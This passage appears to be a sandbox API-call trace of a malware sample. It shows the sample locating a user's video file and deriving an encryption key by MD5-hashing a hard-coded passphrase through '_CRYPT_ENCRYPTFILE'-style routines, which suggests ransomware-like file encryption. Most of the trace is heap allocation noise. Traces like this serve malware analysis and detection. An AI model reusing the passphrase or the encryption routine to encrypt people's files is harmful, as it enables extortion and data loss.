dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ba8 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0103.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0103.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0103.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0103.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0103.366] CloseHandle (hObject=0x298) returned 1 [0103.366] FreeLibrary (hLibModule=0x772d0000) returned 1 [0103.366] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0103.366] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd59e5170, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0x3b529e30, ftLastAccessTime.dwHighDateTime=0x1d5e58c, ftLastWriteTime.dwLowDateTime=0x3b529e30, ftLastWriteTime.dwHighDateTime=0x1d5e58c, nFileSizeHigh=0x0, nFileSizeLow=0xbcb7, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="c1tN0jRrSKz9_ 3.mkv", cAlternateFileName="C1TN0J~1.MKV")) returned 0x41ac040 [0103.367] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0103.367] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.367] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0103.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0103.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0103.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0103.367] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0103.368] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0103.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.368] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0103.368] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.368] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.368] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caad8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0103.368] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0103.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0103.369] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2c08 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b48 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e28a8 [0103.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2788 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0103.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.371] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0103.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0103.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43cad00 [0103.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0103.373] CryptHashData (hHash=0x41ac500, pbData=0x17e2c08, dwDataLen=0x22, dwFlags=0x1) returned 1 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0103.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0103.375] 